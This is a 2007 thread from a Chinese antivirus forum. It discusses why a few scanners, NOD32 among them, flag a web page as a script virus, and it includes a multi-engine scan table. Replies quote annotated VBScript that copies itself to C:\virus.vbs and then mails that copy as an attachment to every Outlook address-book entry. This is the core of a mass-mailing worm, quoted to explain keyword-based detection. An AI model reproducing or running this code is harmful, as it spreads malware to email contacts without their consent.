查看: 4705|回复: 24
收起左侧

[病毒样本] 未知脚本病毒?

[复制链接]
曲中求
发表于 2007-4-13 11:35:52 | 显示全部楼层 |阅读模式
刚刚报的,点阻止以后,网页直接被NOD 32给屏蔽了。。。。



AhnLab-V32007.4.12.004.12.2007 [td]no virus found
AntiVir7.3.1.5004.12.2007 [td]no virus found
Authentium4.93.804.12.2007 [td]no virus found
Avast4.7.936.004.11.2007 [td]no virus found
AVG7.5.0.44704.12.2007 [td]no virus found
BitDefender7.204.13.2007Type_ScriptMailer
CAT-QuickHeal9.0004.12.2007 [td]no virus found
ClamAVdevel-2007031204.13.2007 [td]no virus found
DrWeb4.3304.12.2007 [td]no virus found
eSafe7.0.15.004.12.2007 [td]no virus found
eTrust-Vet30.7.356404.13.2007 [td]no virus found
Ewido4.004.12.2007 [td]no virus found
FileAdvisor104.13.2007 [td]no virus found
Fortinet2.85.0.004.13.2007 [td]no virus found
F-Prot4.3.2.4804.12.2007 [td]no virus found
F-Secure6.70.13030.004.13.2007VBS/GenMail.D
IkarusT3.1.1.504.12.2007 [td]no virus found
Kaspersky4.0.2.2404.13.2007 [td]no virus found
McAfee500704.12.2007 [td]no virus found
Microsoft1.240504.13.2007 [td]no virus found
NOD32v2218504.13.2007probably unknown SCRIPT virus
Norman5.80.0204.12.2007VBS/GenMail.D
Panda9.0.0.404.12.2007 [td]no virus found
Prevx1V204.13.2007 [td]no virus found
Sophos4.16.004.12.2007 [td]no virus found
Sunbelt2.2.907.004.07.2007 [td]no virus found
Symantec1004.13.2007 [td]no virus found
TheHacker6.1.6.08804.09.2007 [td]no virus found
VBA323.11.304.12.2007Email-Worm.VBS.Doggy#1
VirusBuster4.3.7:904.12.2007 [td]no virus found
Webwasher-Gateway6.0.104.13.2007 [td]no virus found

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mofunzone
发表于 2007-4-13 11:44:39 | 显示全部楼层
好好笑。。
不会因为这句话nod就说是病毒吧。。
难道nod也用的是所谓的关键字技术??
本编程的人就可以修改其代码,形成各种各样的变种。
下面以一个简单的脚本为例:
Set objFs=CreateObject (“scripting.FileSystemObject”)(创

建一个文件系统对象)  objFs.CreateTextFile

("C:\virus.txt", 1)(通过文件系统对象的方法创建了TXT文件) 

 如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘

中创建一个TXT文件了。倘若我们把第二句改为:
objFs.GetFile (Wscript.scriptFullName).Copy

("C:\virus.vbs")
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚

本文件,Wscript.scriptFullName指明是这个程序本身,是一个完整

的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复

制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我

复制的功能,已经具备病毒的基本特征——自我复制能力。
曲中求
 楼主| 发表于 2007-4-13 11:51:25 | 显示全部楼层

回复 #2 mofunzone 的帖子

对于经常不仔细看帖和主题的朋友来说,好笑是正常的。
mofunzone
发表于 2007-4-13 11:59:22 | 显示全部楼层

回复 #3 曲中求 的帖子

简单了做了个定位,实际nod是对
Set objOA=Wscript.CreateObject ("Outlook.Application")(创

建一个OUTLOOK应用的对象)
Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间


For i=1 to objMapi.AddressLists.Count(遍历地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))

(取得收件人邮件地址 )  objMail.Subject="你好!" (设置邮

件主题,这个往往具有很大的诱惑性质)
objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容


objMail.Attachments.Add (“c:\virus.vbs")(把自己作为附件

扩散出去 )
objMail.Send  (发送邮件)
Next
Next
Set objMapi=Nothing  (清空objMapi变量,释放资源)
set objOA=Nothing  (清空objOA变量)

这句话过敏

[ 本帖最后由 mofunzone 于 2007-4-12 20:06 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
观弈书童
发表于 2007-4-13 12:05:33 | 显示全部楼层
刚打开帖子就报了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mofunzone
发表于 2007-4-13 12:07:22 | 显示全部楼层
原帖由 观弈书童 于 2007-4-12 20:05 发表
刚打开帖子就报了

和你说了
关键字技术罢了。。
观弈书童
发表于 2007-4-13 12:08:42 | 显示全部楼层
太敏感了
曲中求
 楼主| 发表于 2007-4-13 12:11:21 | 显示全部楼层
原帖由 观弈书童 于 2007-4-13 12:05 发表
刚打开帖子就报了


高效能。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
chenzheyun
发表于 2007-4-13 12:18:39 | 显示全部楼层
还好我没用NOD  
aoyang
头像被屏蔽
发表于 2007-4-13 12:26:58 | 显示全部楼层
绝大多数杀软都采用关键字技术的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-11 10:48 , Processed in 0.140909 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表